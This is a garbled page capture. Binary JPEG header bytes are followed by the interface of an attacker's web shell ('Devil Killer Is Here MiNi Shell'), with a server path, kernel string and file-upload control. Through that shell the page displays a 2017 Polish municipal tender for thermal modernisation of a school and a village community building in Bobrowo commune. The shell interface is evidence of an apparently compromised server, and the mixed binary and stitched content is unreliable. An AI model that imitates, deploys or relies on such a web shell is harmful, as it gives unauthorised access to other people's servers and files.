JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170217/27457-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bobrowo.bip.net' target='_blank'>http://www.bobrowo.bip.net</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 27457 - 2017
              z dnia 2017-02-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bobrowo: Termomodernizacja Szkoły Podstawowej w Drużynach oraz 
Termomodernizacja budynku świetlicy wiejskiej, biblioteki oraz remizy OSP w miejscowości Kruszyny
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />RPO Woj. Kujawsko-Pomorskiego na lata 2014-2020 Oś priorytetowa 3: Efektywność energetyczna i gospodarka niskoemisyjna w regionie</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Bobrowo, krajowy numer identyfikacyjny
              87111838800000, ul.
               
              27,
              87327  
              Bobrowo, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              056 495-18-24, e-mail
              bobrowo@samorzad.org.pl, faks
              056 495-18-10.
              <br />
              Adres strony internetowej (URL): www.bobrowo.bip.net<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bobrowo.bip.net</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bobrowo.bip.net</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej pod rygorem nieważności<br />
                Adres:
                <br />Urząd Gminy Bobrowo, Bobrowo 27, 87-327 Bobrowo pokój nr 12 (Sekretariat)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Termomodernizacja Szkoły Podstawowej w Drużynach oraz 
Termomodernizacja budynku świetlicy wiejskiej, biblioteki oraz remizy OSP w miejscowości Kruszyny
<br /><b>Numer referencyjny: </b>BDG.271.6.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />nie<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie 1.
Termomodernizację Szkoły Podstawowej w Drużynach:
Opracowanie  obejmuje  wykonanie  elewacji,  docieplenie  stropodachu, wykonanie  pokrycia  dachu  wraz  z  obróbkami  dekarskimi  i  orynnowaniem, wymianę częściowo stolarki okiennej i drzwiowej.
Docieplenie ścian zewnętrznych budynku    płyty styropianowe  EPS 80 FASADA gr.  14  cm  mocowane  do  ściany  zewnętrznej  metodą  lekką  z  kołkowaniem. Styropian o  współczynniku  przewodzenia  ciepła    =  0,04  W/m2K.  Natomiast docieplenie ściany zewnętrznej z izolacją grubości 10 cm dodatkowo ocieplić  styropianem EPS 80 FASADA o grubości 5 cm z kołkowaniem.
Izolacja stropodachu  zerwanie istniejących warstw papy w zależności od stanu technicznego  po  odkrywkach,  następnie  należy  ułożyć  warstwę  wełny  mineralnej twardej  o  grubości  15  cm  a  następnie  papę  termozgrzewalną  nawierzchniową grubości 5.2 mm na  SBS na papie podkładowej grubości 3.0 mm.  Zaprojektowano ułożenie wełny mineralnej dwuwarstwowo o grubości dolnej warstwy 10  cm i górnej warstwy 5 cm. - o gęstości płyt co najmniej 170 kg/m3
Kominy      z  uwagi  na  niedostateczny  stan  techniczny  należy  przemurować istniejące ponad dachem kominy z cegły ceramicznej klinkierowej pełnej na zaprawie cementowo-wapiennej  M.5.  Kominy  należy  ponadto  nadmurować,  wykonać  czapę betonową,  osadzić  w  bocznych  ściankach  pionowych  kratki  wentylacyjne  stalowe. Czapy kominowe zakończyć papą termozgrzewalną nawierzchniową.
Mury zewnętrzne  z uwagi na widoczne rozwarstwienia i ubytki fragmentów murów zaprojektowano przemurowanie ścian w miejscach rozwarstwień z cegły ceramicznej pełnej  na  zaprawie  cementowo-wapiennej  M.5  a  także  uzupełnienie  w  miejscach ubytków. 
Ogniomury    zaprojektowano  nadbudowę  istniejących  ogniomurów  cegłą ceramiczną pełna na zaprawie cementowo-wapiennej M.5. o wysokości około 20 cm i szerokości 25  cm.  Nadbudowane  fragmenty  murów  należy  otynkować  zaprawą cementową  oraz  zamknąć  obróbką  dakarską.  Obróbka  dekarska  powinna  być wykonana ze spadkiem do wewnątrz. Połączenie ogniomuru i pokrycia stropodachu należy wykonać wywinięciem papy  termozgrzewalnej  o  wysokości  około  20  cm  z listwą zamykającą stalową z płaskownika .
Roboty wykończeniowe
Obróbki  dekarskie    wymiana  wszystkich  elementów  (rynny  i  rury  spustowe, parapety  zewnętrzne, itp.). Zaprojektowano wymianę parapetów zewnętrznych, obróbek i  orynnowania  na  elementy  z  blachy  ocynkowanej  powlekanej  w  kolorze wskazanym przez Zamawiającego.
Elewacja  budynku  wykonanie wyprawy cienkowarstwowej z akrylowych tynków dekoracyjnych  barwionych  w  masie  o  fakturze  nakrapianej  wg barwy i wzoru wskazanego  przez  zamawiającego.  Należy przyjąć wykonanie elewacji w kilku kolorach  o  intensywności  barwy co najmniej III kat. Załączone przykładowe kolorystyki mogą służyć jedynie poglądowo.
Stolarka okienna PCV  zespolona o wymiarach znormalizowanych. Szklenie okien zewnętrznych  2-krotnie,  K  max=2,0  W/m2K.  Izolacyjność termiczna elementu okna współczynnik U   1.70 W/m2K (z uwzględnieniem zestawów szklanych, profili oraz zaburzeń  brzegowych).  Izolacyjność  termiczna  części  nieprzeźroczystej  U0,25 W/m2K.  Izolacyjność akustyczna okien RA2   32 dB  . Podziały stolarki zgodnie ze wzorem  istniejącym.  Skrzydła okienne rozwieralno-uchylne. Do wymiany zaprojektowano pozostałe okna drewniane. 
Stolarka drzwiowa zewnętrzna  zaprojektowano stolarkę z profili aluminiowych z podziałem  i  przeszkleniem  wyposażoną  w  zamki  na  klucz  patentowy  oraz samozamykacze, kolor biały lub brąz RAL 8011. Szerokość skrzydła części nieryglowanej min. 90 cm w świetle. Drzwi zewnętrzne zaprojektowano z profili z przegrodą termiczną o bardzo dobrej izolacyjności cieplnej. Podstawowe parametry stolarki:
- zastosowanie jako wypełnienia szkła zespolonego o współczynniku U=1.0 W/m2K. 
- profile trzykomorowe o grubości 60 [mm] z wewnętrzną komorą izolacyjną (z przekładek termicznych z poliamidu) które powinny zapobiec przedostawaniu się ciepła na zewnątrz i znacznie ograniczyć zjawisko kondensacji pary wodnej po wewnętrznej stronie drzwi. 
- zastosować zabezpieczenia w postaci zamka z trzypunktową zasuwnicą siekierową klasy C, bolce antywyważeniowe. 
- drzwi w 2 klasie odporności na włamanie. 
- wysoka odporność na wilgoć i działanie promieni UV, 
- podwyższona wytrzymałość na zarysowania 
- zawiasy z trzystopniową regulacją: boczną, wysokości i siły docisku 
Do wymiany zaprojektowano drzwi wejściowe tylne (2 szt).

Zadanie 2. 
Termomodernizację budynku świetlicy wiejskiej, biblioteki oraz remizy OSP                   w miejscowości Kruszyny.
Opracowanie obejmuje projekt termomodernizacji ścian zewnętrznych, części posadzek i stropodachu budynku wraz z wykonaniem elewacji oraz pokrycia dachu polegającym na ułożeniu papy termozgrzewalnej.
Docieplenie ścian zewnętrznych budynku  -  płyty styropianowe  EPS 80 FASADA gr.  12  cm  mocowane do ściany zewnętrznej metodą lekką z kołkowaniem. Styropian o  współczynniku  przewodzenia  ciepła    =  0,036  W/m2K.  (docieplenie dotyczy części budynku bez istniejącego docieplenia).
Izolacja stropodachu niewentylowanego betonowego  zerwanie istniejących warstw papy w zależności od stanu technicznego po odkrywkach, następnie należy ułożyć warstwę wełny mineralnej twardej o grubości 16 cm a następnie papę termozgrzewalną nawierzchniową grubości 5.2 mm na SBS na papie podkładowej grubości 4.0 mm. Zaprojektowano ułożenie wełny mineralnej dwuwarstwowo o grubości dolnej warstwy 10 cm i górnej warstwy 6 cm. - o gęstości płyt co najmniej 170 kg/m3 (współczynnik przewodzenia ciepła  = 0,040 W/m2K).
Kominy      z  uwagi  na  niedostateczny  stan  techniczny  należy  przemurować  istniejące ponad dachem kominy z cegły ceramicznej klinkierowej pełnej na zaprawie cementowo-wapiennej  M.5.  Kominy  należy  ponadto  nadmurować,  wykonać  czapę betonową,  osadzić  w  bocznych  ściankach  pionowych  kratki  wentylacyjne  stalowe. Czapy kominowe zakończyć papą termozgrzewalną nawierzchniową. 
Izolacja stropodachu drewnianego  zerwanie istniejących warstw papy i deskowania.                 W  zależności od stanu technicznego istniejących wiązarów kratowych deskowych należy wykonać wzmocnienie elementów konstrukcyjnych nabijając obustronnie deski, krawędziaki lub wymieniając fragmenty wiązarów (po wykonaniu odkrywek formę naprawy i wzmocnienia wskaże inspektor nadzoru).
Następnie należy ułożyć na dolnym pasie wiązarów warstwę wełny mineralnej grubości                 17 cm o współczynniku przewodzenia ciepła  = 0,043 W/m2K wraz z izolacją z folii paro przepuszczalnej. Następnie należy wykonać nowe deskowanie z izolacją papową i ołaceniem . Jako pokrycie zaprojektowano blachę trapezową T 35E dach powlekaną w kolorze istniejącego pokrycia budynku szkoły. Blachy trapezowe z blachy stalowej ocynkowanej powlekanej o grubości co najmniej 0,55 mm. wykonane zgodnie z normą                     PN-EN 14782:2008 i znakowane znakiem CE. 
Mury zewnętrzne  z uwagi na widoczne drobne rozwarstwienia i ubytki fragmentów murów zaprojektowano przemurowanie ścian w miejscach rozwarstwień z cegły ceramicznej pełnej na zaprawie cementowo-wapiennej M.5 a także uzupełnienie w miejscach ubytków. 
Ogniomury   zaprojektowano nadbudowę istniejących ogniomurów cegłą ceramiczną pełna na zaprawie cementowo-wapiennej M.5. o wysokości około 30 cm i szerokości 25 cm. Nadbudowane fragmenty murów należy otynkować zaprawą cementową oraz zamknąć obróbką dakarską. Obróbka dekarska powinna być wykonana ze spadkiem do wewnątrz. Połączenie ogniomuru i pokrycia stropodachu należy wykonać wywinięciem papy termozgrzewalnej o wysokości około 20 cm z listwą zamykającą stalową z płaskownika .
Roboty wykończeniowe
Obróbki  dekarskie    wymiana  wszystkich  elementów  (rynny  i  rury  spustowe, parapety  zewnętrzne  itp.).  Zaprojektowano  wymianę  obróbek  i  orynnowania  na elementy  z  blachy  ocynkowanej  powlekanej  w  kolorze  wskazanym  przez Zamawiającego.
Elewacja  budynku    wykonanie  wyprawy  cienkowarstwowej  z  akrylowych  tynków dekoracyjnych  barwionych  w  masie  o  fakturze  nakrapianej  (np.  kornik)  wg  barwy  i wzoru  wskazanego  przez  zamawiającego.  Barwa  tynku  kategorii  co  najmniej  III. Zamawiający wymaga malowania elewacji  w co  najmniej  3  kolorystykach. Zaprojektowano  wykonanie  otoków  wokół  otworów  okiennych  ze  styropiany  i  w kolorze  innej  barwy  niż  elewacja.  Wzór  otoków  należy  przyjąć  z  istniejącego budynku szkoły.
3.3.	Przedmiot zamówienia obejmuje również organizację placu budowy, zabezpieczenie terenu budowy, wykonanie niezbędnych badań i prób, uporządkowanie terenu po zakończeniu robót oraz wykonanie innych robót wymaganych technologią. 
3.4.	Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji zawiera:  
	dokumentacja projektowa obejmująca projekty budowlano-wykonawcze, 
	szczegółowe specyfikacje techniczne, 
	wzór umowy, 
	przedmiary robót, kosztorys ofertowy. 
<br /><br /><b>II.5) Główny kod CPV: </b>45321000-3<br /><b> Dodatkowe kody CPV:</b>45261910-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/08/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 25/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych warunków, których
spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych warunków, których
spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi udowodnić, iż wykonał (zrealizował i zakończył) nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy   w tym okresie, co najmniej:
- dla zadania 1. - jedno zadania o wartości nie mniejszej niż 100.000 PLN brutto, związane z termomodernizacją lub dociepleniem ścian i stropodachów budynków użyteczności publicznej. 
- dla zadania 2. - jedno zadania o wartości nie mniejszej niż 100.000 PLN brutto, związane z termomodernizacją lub dociepleniem ścian i stropodachów budynków użyteczności publicznej
UWAGA !
W przypadku składania ofert na zadanie 1 i zadanie 2 należy udowodnić wykonanie dwóch różnych zadań związanych z termomodernizacją lub dociepleniem ścian i stropodachów budynków użyteczności publicznej. 

Wykonawca musi wykazać, iż będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi tj. minimum: kierownikiem budowy z uprawnieniami budowlanymi do kierowania robotami w specjalności konstrukcyjno-budowlanej. 
Uwaga: przez uprawnienia budowlane rozumie się uprawnienia wydane                                na podstawie rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r. poz. 290 ze zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65). 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wykaz oświadczeń lub dokumentów składanych przez Wykonawcę, którego oferta została najwyżej oceniona w postępowaniu, na wezwanie Zamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy Pzp: 
Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,              w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
/Wymagana forma dokumentu  oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę/ 
Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,                          że Wykonawca nie zalega z opłacaniem podatków lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;  
/Wymagana forma dokumentu  oryginał lub kopia poświadczona za zgodność z                        oryginałem przez  Wykonawcę/ 
